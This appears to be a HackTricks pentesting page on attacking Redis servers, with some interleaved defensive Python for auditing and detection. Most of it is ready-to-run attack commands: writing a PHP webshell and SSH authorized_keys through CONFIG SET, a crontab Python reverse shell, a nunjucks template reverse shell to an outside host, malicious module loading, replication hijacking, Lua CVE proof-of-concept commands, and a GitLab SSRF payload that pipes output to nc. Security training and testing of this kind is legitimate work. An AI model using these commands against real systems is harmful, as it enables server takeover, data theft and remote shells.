6379 - Pentesting Redis
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
From the docs: Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker.
By default Redis uses a plain-text based protocol, but keep in mind that it can also implement ssl/tls. Learn how to run Redis with ssl/tls here.
Default port: 6379
PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 4.0.9
Automatic Enumeration
Some automated tools that can help obtaining info from a redis instance:
nmap --script redis-info -sV -p 6379 <IP>
msf> use auxiliary/scanner/redis/redis_server
Manual Enumeration
Banner
Redis is a text based protocol, you can just send the command in a socket and the returned values will be readable. Also remember that Redis can run using ssl/tls (but this is very unusual).
In a regular Redis instance you can just connect using nc or you could also use redis-cli:
nc -vn 10.10.10.10 6379
redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools
The first command you can try is info. It may return output with information about the Redis instance, or something like the following is returned:
-NOAUTH Authentication required.
In this last case, this means that you need valid credentials to access the Redis instance.
Redis Authentication
By default Redis can be accessed without credentials. However, it can be configured to support only a password, or username + password.
It's possible to set a password in the redis.conf file with the parameter requirepass, or temporarily (until the service is restarted) by connecting to it and running: config set requirepass p@ss$12E45.
Also, a username can be configured in the parameter masteruser inside the redis.conf file.
Tip
If only a password is configured, the username used is "default".
Also, note that there is no way to find out externally whether Redis was configured with only a password or with username+password.
In cases like this one you will need to find valid credentials to interact with Redis, so you could try to brute-force it.
Once you have found valid credentials you need to authenticate the session after establishing the connection with the command:
AUTH <username> <password>
Valid credentials will be answered with: +OK
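As an added example (not from the original page), the exchange above done over a raw socket: a minimal RESP encoder/decoder that tells an instance answering anonymously apart from one that replies -NOAUTH or refuses in protected mode, which is what you want when auditing exposure of your own instances. The probe helper and its hostname argument are assumptions; the -DENIED text is Redis' own protected-mode refusal.

```python
import socket

# Added example (not from the page): a minimal RESP encoder/decoder used to tell an
# instance that answers anonymously from one that demands AUTH or sits in protected mode.

def encode_command(*args):
    """Encode a command as a RESP array (what redis-cli sends on the wire)."""
    out = [f"*{len(args)}\r\n".encode()]
    for a in args:
        b = a.encode()
        out.append(f"${len(b)}\r\n".encode() + b + b"\r\n")
    return b"".join(out)

def parse_reply(data):
    """Decode one RESP reply: status (+), error (-), integer (:) or bulk ($)."""
    if not data:
        raise ValueError("empty reply (connection closed?)")
    head, _, rest = data.partition(b"\r\n")
    marker, body = chr(head[0]), head[1:].decode(errors="replace")
    if marker == "+":
        return "status", body
    if marker == "-":
        return "error", body
    if marker == ":":
        return "integer", int(body)
    if marker == "$":
        n = int(body)
        return "bulk", None if n < 0 else rest[:n].decode(errors="replace")
    raise ValueError(f"unsupported reply type {marker!r}")

def classify(reply):
    """Map the first reply to an unauthenticated INFO into an exposure verdict."""
    kind, value = parse_reply(reply)
    if kind == "error" and value.startswith("NOAUTH"):
        return "auth-required"
    if kind == "error" and value.startswith("DENIED"):
        return "protected-mode"      # Redis' refusal when protected-mode is on
    if kind == "error":
        return "error"
    return "open"                    # INFO answered: anonymous access works

def probe(host, port=6379, timeout=3.0):
    """Connect, send INFO server and classify the answer (assumed helper name)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(encode_command("INFO", "server"))
        return classify(s.recv(4096))
```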
Authenticated enumeration
If the Redis server allows anonymous connections or if you have obtained valid credentials, you can start enumerating the service with the following commands:
INFO
[ ... Redis response with info ... ]
client list
[ ... Redis response with connected clients ... ]
CONFIG GET *
[ ... Get config ... ]
Other Redis commands can be found here and here.
Note that the Redis commands of an instance can be renamed or removed in the redis.conf file. For example, this line will remove the command FLUSHDB:
rename-command FLUSHDB ""
More about configuring a Redis service securely here: https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04
You can also monitor in real time the Redis commands being executed with the command monitor, or get the 25 slowest queries with slowlog get 25
Find more information about Redis commands here: https://lzone.de/cheat-sheet/Redis
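To check a redis.conf against the hardening points above (requirepass, rename-command for dangerous commands, bind and protected-mode), here is an added audit script that is not from the page or the Redis project; the DANGEROUS list and the two sample configs are my own constructions.

```python
# Added example (not from the page): audit a redis.conf for the weak settings discussed
# above (no requirepass, dangerous commands not renamed, open bind/protected-mode).
DANGEROUS = ["FLUSHDB", "FLUSHALL", "CONFIG", "DEBUG", "MODULE",
             "SLAVEOF", "REPLICAOF", "EVAL", "EVALSHA", "SCRIPT"]

def parse_conf(text):
    """Return (directives, renamed): directive -> its last argument list (later lines
    win, as in Redis) and original command -> new name ("" means disabled)."""
    directives, renamed = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, *args = line.split()
        args = [a.strip('"') for a in args]
        if name.lower() == "rename-command" and len(args) == 2:
            renamed[args[0].upper()] = args[1]
        else:
            directives[name.lower()] = args
    return directives, renamed

def audit(text):
    """Return a list of human-readable findings; empty means nothing flagged."""
    d, renamed = parse_conf(text)
    findings = []
    binds = d.get("bind", [])
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind: reachable on all interfaces")
    if d.get("protected-mode", ["yes"])[0].lower() == "no":
        findings.append("protected-mode no")
    if "requirepass" not in d and "user" not in d:
        findings.append("no requirepass / ACL user: anonymous access")
    exposed = [c for c in DANGEROUS if renamed.get(c, c) == c]
    if exposed:
        findings.append("not renamed or disabled: " + ", ".join(exposed))
    return findings

# Constructed samples: a weak config and a hardened one
WEAK = "bind 0.0.0.0\nprotected-mode no\nport 6379\n"
HARDENED = ('bind 127.0.0.1\nprotected-mode yes\nrequirepass "p@ss$12E45"\n'
            + "".join(f'rename-command {c} ""\n' for c in DANGEROUS))
```

Renaming a command hides it from the wire; on Redis 6+ an ACL user without the relevant categories (for example -@dangerous) is the supported way to get the same effect per user.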
Dumping Database
Inside Redis the databases are numbered starting from 0. You can find out which ones are in use in the output of the command info, inside the "Keyspace" section:
Or you can just get all the keyspaces (databases) with:
INFO keyspace
In that example databases 0 and 1 are being used. Database 0 contains 4 keys and database 1 contains 1. By default Redis will use database 0. In order to dump, for example, database 1 you need to do:
SELECT 1
[ ... Indicate the database ... ]
KEYS *
[ ... Get Keys ... ]
GET <KEY>
[ ... Get Key ... ]
If you get the error -WRONGTYPE Operation against a key holding the wrong kind of value when running GET <KEY>, it's because the key may be of a type other than string or integer and requires a special operator to display it.
To know the type of the key, use the TYPE command; example below for list and hash keys.
TYPE <KEY>
[ ... Type of the Key ... ]
LRANGE <KEY> 0 -1
[ ... Get list items ... ]
HGET <KEY> <FIELD>
[ ... Get hash item ... ]
# If the type used is weird you can always do:
DUMP <key>
Dump the database with npm redis-dump or python redis-utils
Redis RCE
Interactive Shell
redis-rogue-server can automatically obtain an interactive shell or a reverse shell in Redis (<=5.0.5).
./redis-rogue-server.py --rhost <TARGET_IP> --lhost <ATTACKER_IP>
PHP Webshell
Info from here. You must know the path of the web site folder:
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
OK
10.85.0.52:6379> config set dbfilename redis.php
OK
10.85.0.52:6379> set test "<?php phpinfo(); ?>"
OK
10.85.0.52:6379> save
OK
If the webshell access fails, you can empty the database after making a backup and try again; remember to restore the database.
Template Webshell
Like in the previous section you could also overwrite an html template file that is going to be interpreted by a template engine and get a shell.
For example, following this writeup, you can see that the attacker injected a rev shell in an html interpreted by the nunjucks template engine:
{{ ({}).constructor.constructor(
"var net = global.process.mainModule.require('net'),
cp = global.process.mainModule.require('child_process'),
sh = cp.spawn('sh', []);
var client = new net.Socket();
client.connect(1234, 'my-server.com', function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});"
)()}}
Warning
Note that several template engines cache the templates in memory, so even if you overwrite them, the new one won't be executed. In these cases, either the developer left the automatic reload active or you need to DoS the service (and expect that it will be relaunched automatically).
SSH
Example from here
Please be aware that the result of config get dir can be changed after other manual exploit commands. It is advised to run it first, right after logging into Redis. In the output of config get dir you could find the home of the redis user (usually /var/lib/redis or /home/redis/.ssh), and knowing this you know where you can write the authenticated_users file to access via ssh with the user redis. If you know the home of another valid user where you have write permissions you can also abuse it:
- Generate an ssh public-private key pair on your pc: ssh-keygen -t rsa
- Write the public key to a file: (echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
- Import the file into redis: cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key
- Save the public key to the authorized_keys file on the redis server:
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /var/lib/redis/.ssh
OK
10.85.0.52:6379> config set dbfilename "authorized_keys"
OK
10.85.0.52:6379> save
OK
- Finally, you can ssh to the redis server with the private key: ssh -i id_rsa redis@10.85.0.52
This technique is automated here: https://github.com/Avinash-acid/Redis-Server-Exploit
Additionally, system users can also be discovered by probing with config set dir /home/USER, and after confirmation a new authorized_keys can be written into /home/USER/.ssh/authorized_keys. Use redis-rce-ssh to bruteforce this with a list of usernames and overwrite authorized_keys.
Crontab
root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK
The last example is for Ubuntu; for Centos, the above command should be: redis-cli -h 10.85.0.52 config set dir /var/spool/cron/
This method can also be used to earn bitcoin: yam
Load Redis Module
- Following the instructions from https://github.com/n0b0dyCN/RedisModules-ExecuteCommand you can compile a redis module to execute arbitrary commands.
- Then you need some way to upload the compiled module
- Load the uploaded module at runtime with
MODULE LOAD /path/to/mymodule.so
- List loaded modules to check it was correctly loaded:
MODULE LIST
- Execute commands:
127.0.0.1:6379> system.exec "id"
"uid=0(root) gid=0(root) groups=0(root)\n"
127.0.0.1:6379> system.exec "whoami"
"root\n"
127.0.0.1:6379> system.rev 127.0.0.1 9999
- Unload the module whenever you want:
MODULE UNLOAD mymodule
LUA sandbox bypass
Here you can see that Redis uses the command EVAL to execute Lua code sandboxed. In the linked post you can see how to abuse it using the dofile function, but apparently this isn't possible anymore. Anyway, if you can bypass the Lua sandbox you could execute arbitrary commands on the system. Also, from the same post you can see some options to cause DoS.
Some CVEs to escape from LUA:
Redis Lua Scripting Engine: Sandbox Escapes & Memory Corruption (CVE-2025-49844/46817/46818)
Recent Redis releases fixed multiple issues in the embedded Lua engine that allow sandbox escape, memory corruption and cross-user code execution. These techniques apply when:
- The attacker can authenticate to Redis and Lua is enabled (EVAL/EVALSHA or FUNCTION are available)
- Redis version is older than 8.2.2, 8.0.4, 7.4.6, 7.2.11, or 6.2.20
Tip: If you are new to Lua sandboxing tricks, check this page for general techniques:
Patch-level context:
- Fixed in: 8.2.2, 8.0.4, 7.4.6, 7.2.11, 6.2.20
- Affected when Lua scripting is enabled and the above versions are not applied
CVE-2025-49844 - GC-timed Use-After-Free in Lua parser (lparser.c: luaY_parser)
- Idea: Force garbage collection while the parser still references a freshly-inserted TString. When GC reclaims it, the parser uses a freed pointer (UAF), leading to crash/DoS and potential native code execution outside the Lua sandbox.
- Trigger strategy:
- Create memory pressure with huge strings to encourage GC activity
- Explicitly run GC while a large source chunk is being compiled
- Compile a very large Lua script in a loop until GC aligns with parsing
Minimal EVAL harness to reproduce crashes
# Auth as needed (-a/--user), then run EVAL with 0 keys
redis-cli -h <host> -p 6379 -a <password> EVAL "\
local a = string.rep('asdf', 65536); \
collectgarbage('collect'); \
local src = string.rep('x', 1024 * 1024); \
local f = loadstring(src); \
return 'done'" 0
Notes:
- Many attempts may be needed to align GC with luaY_parser. A crash indicates the UAF was hit.
- Going from exploitation to RCE requires memory grooming and native code pivoting outside the Redis Lua sandbox.
CVE-2025-46817 - Integer overflow in unpack (lbaselib.c: luaB_unpack)
- Root cause: The count n = e - i + 1 is computed without unsigned casts, so extreme indices wrap around, causing Lua to try to unpack far more elements than exist, resulting in stack corruption and memory exhaustion.
- PoC (DoS/mem exhaustion):
redis-cli -h <host> -p 6379 -a <password> EVAL "return unpack({'a','b','c'}, -1, 2147483647)" 0
- Expect the server to try to return a huge number of values and eventually crash or OOM.
CVE-2025-46818 - Cross-user privilege escalation via basic type metatables
- Root cause: During engine initialization, the metatables of basic types (e.g., strings, booleans) were not set read-only. Any authenticated user can poison them to inject methods that other users may later invoke.
- Example (string metatable poisoning):
# Inject a method on strings and then exercise it
redis-cli -h <host> -p 6379 -a <password> EVAL "\
getmetatable('').__index = function(_, key) \
if key == 'testfunc' then \
return function() return 'testfuncoutput' end \
end \
end; \
return ('teststring').testfunc()" 0
# -> Returns: testfuncoutput
- Impact: Code execution across users inside the Lua sandbox with the victim's Redis permissions. Useful for lateral movement/priv-esc across Redis ACL contexts.
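To turn the patch-level context above into a check you can run against your own fleet, here is an added example (not from the page or from Redis) that reads redis_version from INFO server output and compares it with the fixed releases listed for the three CVEs. The rule for branches that have no listed fix is my assumption, stated in the code.

```python
import re

# Added example (not from the page): check a reported redis_version against the fixed
# releases listed above for CVE-2025-49844 / CVE-2025-46817 / CVE-2025-46818.
FIXED = {(8, 2): (8, 2, 2), (8, 0): (8, 0, 4), (7, 4): (7, 4, 6),
         (7, 2): (7, 2, 11), (6, 2): (6, 2, 20)}

def parse_version(info_text):
    """Pull redis_version:X.Y.Z out of INFO server output as an int tuple."""
    m = re.search(r"^redis_version:(\d+)\.(\d+)\.(\d+)", info_text, re.M)
    if not m:
        raise ValueError("redis_version not found in INFO output")
    return tuple(int(x) for x in m.groups())

def lua_cves_status(version):
    """Return 'patched', 'vulnerable' or 'unsupported-branch'.
    Assumption (mine, not the page's): an X.Y branch that is not in FIXED and
    is older than 8.2.2 has no fix and should be handled as if vulnerable."""
    if version >= max(FIXED.values()):
        return "patched"
    fix = FIXED.get(version[:2])
    if fix is None:
        return "unsupported-branch"
    return "patched" if version >= fix else "vulnerable"

def assess(info_text):
    """Combine both steps: returns (version_string, status)."""
    v = parse_version(info_text)
    return ".".join(map(str, v)), lua_cves_status(v)

# Constructed INFO excerpt, the shape redis-cli INFO server prints
SAMPLE_INFO = "# Server\r\nredis_version:7.2.4\r\nredis_mode:standalone\r\n"
```

The version alone does not say whether scripting is reachable: on Redis 6+ an ACL user without the @scripting category cannot call EVAL/EVALSHA/FUNCTION at all, which removes the precondition listed above.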
Master-Slave Module
All the operations of the master Redis are automatically synchronized to the slave Redis, which means we can treat the vulnerable Redis as a slave connected to a master Redis that we control; then we can enter commands on our own Redis.
master redis : 10.85.0.51 (Hacker's Server)
slave redis : 10.85.0.52 (Target Vulnerability Server)
A master-slave connection will be established from the slave redis and the master redis:
redis-cli -h 10.85.0.52 -p 6379
slaveof 10.85.0.51 6379
Then you can login to the master redis to control the slave redis:
redis-cli -h 10.85.0.51 -p 6379
set mykey hello
set mykey2 helloworld
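The webshell, SSH, crontab, module and master-slave sections above all leave the same footprint in the monitor stream mentioned earlier. As an added example (not from the page), these detection rules parse MONITOR output and flag the CONFIG SET dir/dbfilename + SAVE chain, SLAVEOF/REPLICAOF to an arbitrary host, and MODULE LOAD; the client addresses in the sample lines are constructed, the paths are the page's.

```python
import re

# Added example (not from the page): detection rules over MONITOR output for the CONFIG SET
# dir/dbfilename + SAVE file-write chain, SLAVEOF/REPLICAOF hijacking and MODULE LOAD.
LINE = re.compile(r"^(\d+\.\d+) \[(\d+) (\S+)\] (.*)$")
ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')

def parse_monitor_line(line):
    """Return (timestamp, db, client, args) or None if not a MONITOR line."""
    m = LINE.match(line.strip())
    if not m:
        return None
    args = [a.replace('\\"', '"') for a in ARG.findall(m.group(4))]
    return float(m.group(1)), int(m.group(2)), m.group(3), args

def detect(lines):
    """Return (client, alert) pairs; CONFIG SET state is tracked per client."""
    pending, alerts = {}, []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[3]:
            continue
        _, _, client, args = parsed
        name = args[0].lower()
        sub = args[1].lower() if len(args) > 1 else ""
        if name == "config" and sub == "set" and len(args) >= 4 and args[2].lower() in ("dir", "dbfilename"):
            key = args[2].lower()
            pending.setdefault(client, {})[key] = args[3]
            alerts.append((client, f"rdb-target-change: {key}={args[3]}"))
        elif name in ("save", "bgsave") and client in pending:
            p = pending.pop(client)
            target = f"{p.get('dir', '?')}/{p.get('dbfilename', '?')}"
            alerts.append((client, f"rdb-write-redirect: {target}"))
        elif name in ("slaveof", "replicaof") and [a.lower() for a in args[1:3]] != ["no", "one"]:
            alerts.append((client, f"replication-hijack: {':'.join(args[1:3])}"))
        elif name == "module" and sub == "load":
            alerts.append((client, f"module-load: {args[2] if len(args) > 2 else '?'}"))
    return alerts

# Constructed MONITOR lines (client addresses made up; target paths are the page's)
SAMPLE = """1700000000.000001 [0 10.85.0.99:51234] "config" "set" "dir" "/var/lib/redis/.ssh"
1700000000.000002 [0 10.85.0.99:51234] "config" "set" "dbfilename" "authorized_keys"
1700000000.000003 [0 10.85.0.99:51234] "save"
1700000000.000004 [0 10.85.0.98:40000] "slaveof" "10.85.0.51" "6379"
1700000000.000005 [0 10.85.0.98:40000] "module" "load" "/tmp/mymodule.so"
1700000000.000006 [0 10.85.0.10:40001] "set" "mykey" "hello"
1700000000.000007 [0 10.85.0.10:40001] "replicaof" "no" "one"
""".splitlines()
```

A changed dir/dbfilename is worth an alert on its own, because a scheduled snapshot writes to the same path even if the client never issues SAVE.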
SSRF talking to Redis
If you can send clear text requests to Redis, you can communicate with it, as Redis will read the request line by line and just respond with errors to the lines it doesn't understand:
-ERR wrong number of arguments for 'get' command
-ERR unknown command 'Host:'
-ERR unknown command 'Accept:'
-ERR unknown command 'Accept-Encoding:'
-ERR unknown command 'Via:'
-ERR unknown command 'Cache-Control:'
-ERR unknown command 'Connection:'
Therefore, if you find an SSRF vuln in a website and you can control some headers (maybe with a CRLF vuln) or POST parameters, you will be able to send arbitrary commands to Redis.
Example: Gitlab SSRF + CRLF to Shell
In Gitlab 11.4.7 an SSRF and a CRLF vulnerability were discovered. The SSRF vulnerability was in the import project from URL functionality when creating a new project and allowed accessing arbitrary IPs in the form [0:0:0:0:0:ffff:127.0.0.1] (this will access 127.0.0.1), and the CRLF vuln was exploited just by adding %0D%0A characters to the URL.
Therefore, it was possible to abuse these vulnerabilities to talk to the Redis instance that manages the gitlab queues and abuse those queues to obtain code execution. The Redis queue abuse payload is:
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
And the URL encoded request abusing SSRF and CRLF to execute a whoami and send back the output via nc is:
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
For some reason (as for the author of https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ where this info was taken from) the exploitation worked with the git scheme and not with the http scheme.
References
- Recent Vulnerabilities in Redis Server's Lua Scripting Engine (OffSec)
- NVD: CVE-2025-49844
- NVD: CVE-2025-46817
- NVD: CVE-2025-46818
- Wiz analysis of Redis RCE (CVE-2025-49844)
- PoC: CVE-2025-49844 - Lua parser UAF
- PoC: CVE-2025-46817 - unpack integer overflow
- PoC: CVE-2025-46818 - basic-type metatable abuse

